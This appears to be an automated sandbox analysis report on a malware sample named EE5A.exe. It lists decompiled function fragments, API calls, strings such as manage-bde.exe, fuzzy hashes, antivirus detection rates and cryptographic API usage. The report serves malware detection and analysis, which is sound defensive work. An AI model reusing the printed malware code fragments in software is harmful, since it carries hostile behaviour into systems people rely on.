Instruction Fuzzy Hash: 23217FB5E40209EFC7009FB8ECD4AED7BB1EF29310F04807AA944A7362D7791A55CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00475D05 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00475D22

Strings

?, xrefs: 00475D37
CNBBR334.DLL, xrefs: 00475DDC
@Cqt, xrefs: 00475D86
RegQueryInfoKeyW, xrefs: 00475DCC

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: ?$@Cqt$CNBBR334.DLL$RegQueryInfoKeyW
API String ID: 190572456-423818036
Opcode ID: e6474b042d2ca7f480acc476dc3254cf4e9bdb17c54cfa2a03ba4d941ce01024
Instruction ID: 26a511727673ce9a404fd6d8b634469890a0c1e78312e677e71b3b708562ac59
Opcode Fuzzy Hash: e6474b042d2ca7f480acc476dc3254cf4e9bdb17c54cfa2a03ba4d941ce01024
Instruction Fuzzy Hash: 7E219261F506459FCB00AF78E9943E97BB2EB2A310B44817B89099B762E3790A58C749

Uniqueness

Uniqueness Score: -1.00%

Function 00471B2F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 00471BB0

Strings

ehshell.dll, xrefs: 00471C0A, 00471C0F
mtxclu.dll, xrefs: 00471B73
RegQueryInfoKeyW, xrefs: 00471BBC
yv, xrefs: 00471B47

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: RegQueryInfoKeyW$ehshell.dll$mtxclu.dll$yv
API String ID: 190572456-1594471236
Opcode ID: 848b6f2bb662f576171d2120275d933dd8fe6bc65d4ad742d9d5b57ad0f7ed48
Instruction ID: 6dec3c26e2aac2d5d563760dc3c59a6e73d9c219c55ec5f2194b36a88536c8a0
Opcode Fuzzy Hash: 848b6f2bb662f576171d2120275d933dd8fe6bc65d4ad742d9d5b57ad0f7ed48
Instruction Fuzzy Hash: 08213B75E04209AFCB04EFB8E9904EDBBB1EB2C300F50817AD949E7362E2741A55C749

Uniqueness

Uniqueness Score: -1.00%

Function 004A033C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

GetSidSubAuthorityCount.ADVAPI32(?), ref: 004A04DF

Strings

MXEAgent.dll, xrefs: 004A042B
mtxclu.dll, xrefs: 004A036B
kO, xrefs: 004A03B8

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AuthorityCount
String ID: MXEAgent.dll$kO$mtxclu.dll
API String ID: 3768604245-3811837910
Opcode ID: 4ee517a12b09763f3ceeee7f79837d7d0b721fb3f7281da64b4753f8466af2cf
Instruction ID: 352342a6fb48df974da9cc4e8ed688523107cbf166319f84f4866027375128ec
Opcode Fuzzy Hash: 4ee517a12b09763f3ceeee7f79837d7d0b721fb3f7281da64b4753f8466af2cf
Instruction Fuzzy Hash: 8E61BE66E54241CFC700DF79FC946E93BB3EB6A324708813AC948D7766E2790524C76D

Uniqueness

Uniqueness Score: -1.00%

Function 00487C21 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 00487D59

Strings

*R?, xrefs: 00487C24
MXEAgent.dll, xrefs: 00487C81
4%(, xrefs: 00487D79

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: *R?$4%($MXEAgent.dll
API String ID: 190572456-3252297937
Opcode ID: 76417e3b8bf0e3d8168b94b9dbbfd8387f2fa690dee9c6c0dc3a37f3f976b11a
Instruction ID: b090f283b3ed2ddded25215772508ddebfc303353404146d0a4678e4daa5c19d
Opcode Fuzzy Hash: 76417e3b8bf0e3d8168b94b9dbbfd8387f2fa690dee9c6c0dc3a37f3f976b11a
Instruction Fuzzy Hash: AC51CD75E1420A9BCB00EFB8E9A42ED7BB2EF29314F14807BD545D7361E2394A55CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00482B02 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 00482C6E

Strings

MXEAgent.dll, xrefs: 00482BE0
ehshell.dll, xrefs: 00482B02
RegQueryInfoKeyW, xrefs: 00482C84

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: MXEAgent.dll$RegQueryInfoKeyW$ehshell.dll
API String ID: 190572456-3749885817
Opcode ID: cb00bfb9695edd878d4fc8d4af5179097a9a9f674ac53c6f6287d74d51fba543
Instruction ID: 9b9dd1a59976c95e93ab7287375b939dbd7b79a1ba3f4c6a85844cf31c223f16
Opcode Fuzzy Hash: cb00bfb9695edd878d4fc8d4af5179097a9a9f674ac53c6f6287d74d51fba543
Instruction Fuzzy Hash: 5541AB75E542499FCB00AFB9E8942ED7BB2FB2D320F44807ADA45E7361E3740695CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004B0676 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON

Download Yara Rule

APIs

Process32NextW.KERNEL32(?,?), ref: 004B0777

Strings

CoRevokeInitializeSpy, xrefs: 004B06B3
sspicli.dll, xrefs: 004B078A, 004B07C0, 004B07C1
disrvpp.dll, xrefs: 004B07B4

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: NextProcess32
String ID: CoRevokeInitializeSpy$disrvpp.dll$sspicli.dll
API String ID: 1850201408-1296152808
Opcode ID: 135bc5a7696c05baf200b0247b21786415518f9b4e6ee8ac6b467449e15518d5
Instruction ID: b075b23e1c186a34697128c2e614c06fba4e313644122c3eda3d2ec61216279f
Opcode Fuzzy Hash: 135bc5a7696c05baf200b0247b21786415518f9b4e6ee8ac6b467449e15518d5
Instruction Fuzzy Hash: AA318C79E10209AFCB00DFB8E8945EEBFB1EB2A314F0440BAE544E7351E6355A94CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0047C019 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 0047C110

Strings

psapi.dll, xrefs: 0047C08F
ehshell.dll, xrefs: 0047C131, 0047C136, 0047C139
t), xrefs: 0047C0E9

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: ehshell.dll$psapi.dll$t)
API String ID: 190572456-695682364
Opcode ID: e1e3d67373a19b6c38e2d97bb27a316c6e1a960e7715bafebb173faf4184f9c7
Instruction ID: 946f4576f97963e4efb41b8e5b61e2939f8434eff7ee93d3120d1b892ec5eded
Opcode Fuzzy Hash: e1e3d67373a19b6c38e2d97bb27a316c6e1a960e7715bafebb173faf4184f9c7
Instruction Fuzzy Hash: 8621D075E44245CFCB009FB8BC946E97BB1FF2A314B04827FD955A7762D2280A24CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004A0241 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E004A0241(int __eax, signed int __ecx, short __edx, void* __edi, void* __esi) {
				char _t17;
				intOrPtr _t18;
				int _t21;
				int _t23;
				int _t25;
				intOrPtr _t29;
				short _t63;
				intOrPtr _t64;
				void* _t70;
				void* _t78;

				_t75 = __esi;
				_t62 = __edx;
				_t57 = __ecx;
				if(__eax != 0) {
					 *(_t78 - 8) = __eax;
					 *0x4fd1fa = __edx;
					 *0x4fd1d6 = __edx + __edx;
					_push(E004A0280);
					_t62 = E0049D0D9;
					goto __edx;
				}
				_push(__eax);
				 *0x4fff1b = __eax;
				_t70 = __edi - 0xe2da;
				_pop(_t17);
				 *0x4fff1e = _t17;
				if(_t70 >= 0) {
					 *(_t78 - 8) = __ecx;
					_t57 =  !(__ecx + __ecx - 0x7584);
					_t62 = 0x9cf0;
					 *0x4fed1f =  *0x4fed1f - 0x9cf0;
					_t75 = __esi + 0xc45c;
					 *0x4fff1d = _t17;
					_t70 = 0xffffffffffffffff;
				}
				 *0x4fd553 = _t17;
				 *0x4fd67f = _t17;
				_t63 = _t62 - 0x95;
				 *0x4feba7 =  *0x4feba7 - _t63;
				_t18 =  *0x4fff19; // -107
				 *0x4fff1b =  *0x4fff1b - _t18;
				 *0x4fd6d3 =  *0x4fd6d3 + _t70;
				_t21 = _t17;
				 *(_t78 - 8) = _t21;
				 *0x4fd1cc = _t63;
				_t64 =  *0x4fd1fe; // 0xa5ad
				 *0x4fff19 =  *0x4fff19 - _t64;
				 *0x4fd24c =  *0x4fd24c + _t75;
				_t23 =  *(_t78 - 8);
				 *0x4fd050 =  *0x4fd050 - _t23;
				 *(_t78 - 8) = _t23;
				_t25 = CloseHandle( *(_t78 - 0x14));
				 *(_t78 - 8) = _t25;
				if((_t57 + 0x00000071 & 0x00007f2d) < 0) {
					 *0x4fff1d = 0xd1;
					_t29 = 0;
					 *0x4fd59f = 0;
					if(0 > 0x22) {
						_t29 =  *0x4fd9ab; // 0x0
					}
					 *0x4fff1e =  *0x4fff1e - _t29;
					 *0x4fd79f =  *0x4fd79f + 0x11dfb8;
				}
				return  *((intOrPtr*)(_t78 - 0x34));
			}

0x004a0241
0x004a0241
0x004a0241
0x004a0243
0x004a024b
0x004a024e
0x004a026d
0x004a0274
0x004a0279
0x004a027e
0x004a027e
0x004a09cd
0x004a09ce
0x004a09d4
0x004a09d9
0x004a09da
0x004a09e2
0x004a09fd
0x004a0a08
0x004a0a14
0x004a0a18
0x004a0a20
0x004a0a25
0x004a0a2c
0x004a0a2c
0x004a0a2d
0x004a0a32
0x004a0a3f
0x004a0a42
0x004a0a4a
0x004a0a50
0x004a0a56
0x004a0a67
0x004a0a72
0x004a0a75
0x004a0a7c
0x004a0a83
0x004a0a89
0x004a0a92
0x004a0a9a
0x004a0aa4
0x004a0aad
0x004a0ab3
0x004a0abe
0x004a0ad4
0x004a0ad9
0x004a0ae1
0x004a0ae8
0x004a0aea
0x004a0afc
0x004a0b01
0x004a0b14
0x004a0b14
0x004a0b34

APIs

CloseHandle.KERNEL32(?), ref: 004A0AAD

Strings

manage-bde.exe, xrefs: 004A0263, 004A09EA
MXEAgent.dll, xrefs: 004A0B25
KBDBGPH.DLL, xrefs: 004A0AEF

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CloseHandle
String ID: KBDBGPH.DLL$MXEAgent.dll$manage-bde.exe
API String ID: 2962429428-2916227509
Opcode ID: 680b67fa2fabf6b5117d9754870756b8cc9247bea9df7258bd0448e5815cc212
Instruction ID: 0474f807ccc33558951450eed6039872697c2b30a1feab94144840a4b1ecb843
Opcode Fuzzy Hash: 680b67fa2fabf6b5117d9754870756b8cc9247bea9df7258bd0448e5815cc212
Instruction Fuzzy Hash: 9141C266E043469FC700DFBAF8842E97BB2EB69318B04417BC948D7322D7784A65C75D

Uniqueness

Uniqueness Score: -1.00%

Function 004A00AF Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004A00AF(intOrPtr __eax, void* __ebx, signed int __ecx, void* __edi, void* __esi) {
				char _t14;
				intOrPtr _t15;
				int _t18;
				int _t20;
				int _t22;
				intOrPtr _t26;
				intOrPtr _t57;
				intOrPtr _t61;
				void* _t63;
				void* _t71;

				_t68 = __esi;
				_t50 = __ecx;
				if(__eax == 0) {
					_push(__eax);
					 *0x4fff1b = __eax;
					_t63 = __edi - 0xe2da;
					_pop(_t14);
					 *0x4fff1e = _t14;
					if(_t63 >= 0) {
						 *(_t71 - 8) = __ecx;
						_t50 =  !(__ecx + __ecx - 0x7584);
						 *0x4fed1f =  *0x4fed1f - 0x9cf0;
						_t68 = __esi + 0xc45c;
						 *0x4fff1d = _t14;
						_t63 = 0xffffffffffffffff;
					}
					 *0x4fd553 = _t14;
					 *0x4fd67f = _t14;
					 *0x4feba7 =  *0x4feba7 - 0x9c5b;
					_t15 =  *0x4fff19; // -107
					 *0x4fff1b =  *0x4fff1b - _t15;
					 *0x4fd6d3 =  *0x4fd6d3 + _t63;
					_t18 = _t14;
					 *(_t71 - 8) = _t18;
					 *0x4fd1cc = 0x9c5b;
					_t57 =  *0x4fd1fe; // 0xa5ad
					 *0x4fff19 =  *0x4fff19 - _t57;
					 *0x4fd24c =  *0x4fd24c + _t68;
					_t20 =  *(_t71 - 8);
					 *0x4fd050 =  *0x4fd050 - _t20;
					 *(_t71 - 8) = _t20;
					_t22 = CloseHandle( *(_t71 - 0x14));
					 *(_t71 - 8) = _t22;
					if((_t50 + 0x00000071 & 0x00007f2d) < 0) {
						 *0x4fff1d = 0xd1;
						_t26 = 0;
						 *0x4fd59f = 0;
						if(0 > 0x22) {
							_t26 =  *0x4fd9ab; // 0x0
						}
						 *0x4fff1e =  *0x4fff1e - _t26;
						 *0x4fd79f =  *0x4fd79f + 0x11dfb8;
					}
					return  *((intOrPtr*)(_t71 - 0x34));
				} else {
					_t61 =  *0x4fd1a2; // 0x5e
					_push(__eax);
					_push(_t61);
					_push(_t61);
					_push(0x4a00cf);
					_push(L004618E3);
					return __eax;
				}
			}

0x004a00af
0x004a00af
0x004a00b1
0x004a09cd
0x004a09ce
0x004a09d4
0x004a09d9
0x004a09da
0x004a09e2
0x004a09fd
0x004a0a08
0x004a0a18
0x004a0a20
0x004a0a25
0x004a0a2c
0x004a0a2c
0x004a0a2d
0x004a0a32
0x004a0a42
0x004a0a4a
0x004a0a50
0x004a0a56
0x004a0a67
0x004a0a72
0x004a0a75
0x004a0a7c
0x004a0a83
0x004a0a89
0x004a0a92
0x004a0a9a
0x004a0aa4
0x004a0aad
0x004a0ab3
0x004a0abe
0x004a0ad4
0x004a0ad9
0x004a0ae1
0x004a0ae8
0x004a0aea
0x004a0afc
0x004a0b01
0x004a0b14
0x004a0b14
0x004a0b34
0x004a00ba
0x004a00ba
0x004a00c1
0x004a00c2
0x004a00c3
0x004a00c4
0x004a00c9
0x004a00ce
0x004a00ce

APIs

CloseHandle.KERNEL32(?), ref: 004A0AAD

Strings

manage-bde.exe, xrefs: 004A09EA
MXEAgent.dll, xrefs: 004A0B25
KBDBGPH.DLL, xrefs: 004A0AEF

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CloseHandle
String ID: KBDBGPH.DLL$MXEAgent.dll$manage-bde.exe
API String ID: 2962429428-2916227509
Opcode ID: 956cff19173461c81165d10bc4d838bd725e6b381d6aa603258203f49ba131cd
Instruction ID: a3fdc29d709ae4425357f2eb0ec5350a3c53ac3bc696081d3a8fc38a9452f8f6
Opcode Fuzzy Hash: 956cff19173461c81165d10bc4d838bd725e6b381d6aa603258203f49ba131cd
Instruction Fuzzy Hash: 3A31F3A5A043429FC700DFBAFC846E93BB2EB69318700007BD848D7322D7780965C769

Uniqueness

Uniqueness Score: -1.00%

Function 004870C6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 144libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 00487162

Strings

CreateActCtxW, xrefs: 004870DC, 004871B9, 004872C4
user.exe, xrefs: 0048716F

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: CreateActCtxW$user.exe
API String ID: 190572456-2600503287
Opcode ID: a99c0a00c44568f3be07f64eb381265f90d4df7e8049f82e92b56b9a271ce892
Instruction ID: 89b1f33ca4f05d8faed602531d85cd5a79270ad0551240f5839dd152f31102fa
Opcode Fuzzy Hash: a99c0a00c44568f3be07f64eb381265f90d4df7e8049f82e92b56b9a271ce892
Instruction Fuzzy Hash: BE51BE65E48245DFCB00AFB8EC946ED7FB2FF2A314B0440BAD94597322D2790668C75C

Uniqueness

Uniqueness Score: -1.00%

Function 0046209B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 004621E5

Strings

J>=, xrefs: 0046211C
msobjs.dll, xrefs: 00462160

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: J>=$msobjs.dll
API String ID: 190572456-1860101516
Opcode ID: f760ff5ee7009c483cf5c02fc3f9c8b07feff38dd741eb1a971672c747c0e1fa
Instruction ID: 82e873cf2da18fbcbd957e38f14f128738e3f0bd585ce3188bde69e0aa2fd40c
Opcode Fuzzy Hash: f760ff5ee7009c483cf5c02fc3f9c8b07feff38dd741eb1a971672c747c0e1fa
Instruction Fuzzy Hash: D541216AE083819FC700DB3CFC546E93FB2EBA7320708417BC954A7362E2680515CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0049C7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E0049C7F0(_Unknown_base(*)()* __eax, intOrPtr __ebx, void* __ecx, short __edx, void* __esi) {
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t17;
				_Unknown_base(*)()* _t20;
				intOrPtr _t21;
				intOrPtr _t24;
				_Unknown_base(*)()* _t25;
				void* _t26;
				intOrPtr _t28;
				intOrPtr _t37;
				intOrPtr _t39;
				void* _t41;
				void* _t42;
				void* _t43;

				_t41 = __esi;
				_t36 = __edx;
				_t21 = __ebx;
				_t9 = __eax;
				if(__ebx >= __ebx) {
					L4:
					_t37 =  *0x4fd1e2; // 0x0
					_t36 = _t37 - 0x8da383 + 0xadb1;
					 *0x4fff19 = _t9;
					_t41 = _t41 + _t41;
					if(_t9 > 0 && _t9 != 0) {
						 *0x4fff1d = _t9;
					}
					_t9 = 0;
					L8:
					 *0x4fff12 =  *0x4fff12 - _t21;
					if(_t21 >= _t21) {
						L11:
						 *0x4fd1e6 =  *0x4fd1e6 + _t36;
						 *0x4fd1fe = _t36;
						_t15 = GetProcAddress(??, ??);
						_t39 =  *0x4fd200; // 0x3597
						 *0x4fff19 = _t15;
						 *0x4fff1b = _t15;
						 *(_t43 - 8) = _t15;
						_t24 = _t15 - 0xffffffffffffce2e;
						_push(0);
						_push(_t24);
						L0045F957(_t15, _t41);
						 *((intOrPtr*)(_t43 - 0xc)) = _t24;
						_t25 = 0;
						_t17 =  *(_t43 - 8);
						_t28 =  *0x4fd138; // 0x4
						 *0x4fff16 =  *0x4fff16 + _t28;
						if(_t28 > _t28) {
							_t39 = 0x992c;
							 *0x4fff19 = _t17;
							_t25 = _t17;
							_t42 = _t41 - 0xc099;
							if(_t42 == 0) {
								 *0x4ff8dc =  *0x4ff8dc + _t42;
							}
						}
						 *(_t43 - 8) = _t17;
						 *0x4fdc5f = _t25;
						_t26 = _t25 + _t25;
						_push(1);
						_push(_t26);
						_push(_t26);
						L004618BC("user.exe", _t39);
						_t20 =  *(_t43 - 8);
						 *0x4fe9ff = _t20;
						return _t20;
					}
					 *((intOrPtr*)(_t43 - 0xc)) = _t21;
					L10:
					 *0x4fd166 = 0x67c7;
					 *0x4fd180 = 0x67c7;
					_t36 = _t36 - 0x8751;
					goto L11;
				}
				 *0x4fff14 =  *0x4fff14 + __ebx;
				if(__ebx < __ecx) {
					goto L10;
				}
				if(__ecx >= __ecx) {
					goto L8;
				}
				 *0x4fd1b0 = __edx;
				goto L4;
			}

0x0049c7f0
0x0049c7f0
0x0049c7f0
0x0049c7f0
0x0049c7f3
0x0049c818
0x0049c818
0x0049c825
0x0049c82a
0x0049c830
0x0049c834
0x0049c83a
0x0049c83a
0x0049c848
0x0049c84b
0x0049c84f
0x0049c857
0x0049c878
0x0049c878
0x0049c87f
0x0049c88c
0x0049c892
0x0049c899
0x0049c89f
0x0049c8aa
0x0049c8ad
0x0049c8b2
0x0049c8b4
0x0049c8b5
0x0049c8ba
0x0049c8bd
0x0049c8bf
0x0049c8c2
0x0049c8c9
0x0049c8d1
0x0049c8dd
0x0049c8e1
0x0049c8e7
0x0049c8e9
0x0049c8f1
0x0049c8f3
0x0049c8f3
0x0049c8f1
0x0049c8f9
0x0049c901
0x0049c907
0x0049c909
0x0049c90b
0x0049c90c
0x0049c90d
0x0049c912
0x0049c915
0x0049c91b
0x0049c91b
0x0049c859
0x0049c85c
0x0049c863
0x0049c86a
0x0049c873
0x00000000
0x0049c873
0x0049c7f5
0x0049c7fe
0x00000000
0x00000000
0x0049c802
0x00000000
0x00000000
0x0049c811
0x00000000

APIs

GetProcAddress.KERNEL32 ref: 0049C88C

Strings

api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 0049C843
user.exe, xrefs: 0049C8FC

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: api-ms-win-core-libraryloader-l1-1-0.dll$user.exe
API String ID: 190572456-3392757024
Opcode ID: a82951d78d8e079eb4421d0591fb26b9a51a8df7980cb72d7f8662d89671b286
Instruction ID: b424316ec606f2c43d2094a7a5a569fc68f36ac37acb647c2f3b0b5348088e85
Opcode Fuzzy Hash: a82951d78d8e079eb4421d0591fb26b9a51a8df7980cb72d7f8662d89671b286
Instruction Fuzzy Hash: DE21CE65D442859BCB00FF74AD942F93F62EF3A308B4441BBD84097361E2750629C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 004C315E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?), ref: 004C3242

Strings

sqlsrv32.dll, xrefs: 004C31C4
user.exe, xrefs: 004C31BF

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: Create
String ID: sqlsrv32.dll$user.exe
API String ID: 2289755597-2715073837
Opcode ID: 2e6a5fd85ef66a59b1347e8c2219a7169b82e253a13488013d1d29fdc0b16f15
Instruction ID: dd19713b1e61164dd903f519bbb0cf37470dfb7f9a4a272e5382ae4e3e3dfbbb
Opcode Fuzzy Hash: 2e6a5fd85ef66a59b1347e8c2219a7169b82e253a13488013d1d29fdc0b16f15
Instruction Fuzzy Hash: D821483EA401118FDB40AFB5D8997EA3B72EF29325B04807BD80087721E27C0B55CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004BF4A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindow.USER32(?), ref: 004BF50B

Strings

msmpeg2adec.dll, xrefs: 004BF54D
sqlsrv32.dll, xrefs: 004BF559

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: Window
String ID: msmpeg2adec.dll$sqlsrv32.dll
API String ID: 2353593579-2908349084
Opcode ID: 5059735878080c5c3c7f72422f546605ad509ed3d32b6101f09bdb3615ff9ce3
Instruction ID: 07c787bea2691e7dea49ba10e6f610b6cc12a6d917d8e2203d3527f9d08f1adc
Opcode Fuzzy Hash: 5059735878080c5c3c7f72422f546605ad509ed3d32b6101f09bdb3615ff9ce3
Instruction Fuzzy Hash: 9F11E726E04656CF8B008F78AC841E93F71DA3A728744023BDD58EB761C2341A1DC7E8

Uniqueness

Uniqueness Score: -1.00%

Function 004DBD39 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 004DBD40

Strings

manage-bde.exe, xrefs: 004DBD4D
@hqt, xrefs: 004DBD40

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: @hqt$manage-bde.exe
API String ID: 626452242-2029001528
Opcode ID: ccc64e3e0a2fc6a6efe6ae31cd3fc9e3a7e6044ce70a5a131015c07ebe64904e
Instruction ID: 3ba15d21e4e56bab00e5266a742b016cc804799502491425c26bd33bfe3bf2a9
Opcode Fuzzy Hash: ccc64e3e0a2fc6a6efe6ae31cd3fc9e3a7e6044ce70a5a131015c07ebe64904e
Instruction Fuzzy Hash: 38D0A730E4030DABCB109FA6C4C96AC7A72E754301BD8C03F6504A1390D7BC55004F08

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Virustotal: Detection: 47%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Roaming\wdscede	ReversingLabs: Detection: 46%

Source: 12.2.F50.exe.4a6512c.2.unpack	Avira: Label: TR/Patched.Ren.Gen7
Source: 5.2.EE5A.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2

Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004AA034 CryptCreateHash,GetTempPathW,	5_2_004AA034
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004A604F CryptCreateHash,CryptCreateHash,	5_2_004A604F
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004A2015 CryptGenKey,	5_2_004A2015
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004DA0DA CryptDestroyHash,	5_2_004DA0DA
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004A715D CryptDestroyHash,WSAStartup,CryptReleaseContext,CryptReleaseContext,	5_2_004A715D
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B121F CryptGenKey,	5_2_004B121F
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004A32B3 CryptGenKey,	5_2_004A32B3
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004AD36A CryptGenKey,CryptExportKey,	5_2_004AD36A
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004D23B8 CryptReleaseContext,	5_2_004D23B8
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_0047953C CryptGenKey,	5_2_0047953C
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004E55F9 RegSetValueExW,CryptDestroyHash,	5_2_004E55F9
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_0048766C CryptDestroyHash,GetProcAddress,	5_2_0048766C
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004A06C7 CryptDestroyKey,	5_2_004A06C7
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004AE87C CryptExportKey,CryptDestroyKey,	5_2_004AE87C
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B9952 CryptAcquireContextA,CryptAcquireContextA,	5_2_004B9952
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004AD9ED CreateToolhelp32Snapshot,CryptBinaryToStringA,	5_2_004AD9ED
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004C49F4 CryptGenKey,	5_2_004C49F4
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B99AA CryptImportKey,CryptImportKey,	5_2_004B99AA
